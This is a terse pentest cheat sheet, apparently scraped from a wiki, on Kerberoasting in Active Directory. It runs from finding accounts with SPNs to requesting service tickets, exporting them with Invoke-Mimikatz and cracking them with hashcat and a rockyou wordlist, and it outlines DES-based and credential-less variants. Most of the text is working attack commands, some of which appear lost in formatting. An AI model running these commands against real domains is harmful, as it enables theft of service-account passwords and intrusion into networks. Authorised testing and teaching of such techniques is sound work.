Kerberoasting
Kerberoasting
Find users with SPN
Get-NetUser -SPNGet-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalNameRequest ST
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "SPN/<target>.domain.local"Export the ticket
Invoke-Mimikatz -Command '"kerberos::list /export"'Crack the ticket
hashcat -m 13100 -a 0 ticket.kirbi /usr/share/wordlist/rockyou.txtAlternative Method: Rubeus
Kerberoast with DES
1) Check if DES is enabled
2) Request a ST fot the target SPN
3) Perform a U2U request. The goal is to obtain a ticket for the user than can be decrypted to read the first block of plain text. This block will be used after to form a crackable hash. Retrieve the value of "Block One Plain Text" in the output
4) Then, reuse this value in the /desplaintext parameter with the describe command
5) The Kerberoast Hash value in the output can be used with hashcat:
Kerberoast without credentials
Without pre-authentication
With MitM
WARNING: RoastInTheMiddle.exe is only a PoC for the moment, be carefull with it in prod environment !
Combined with DES
Steps
Last updated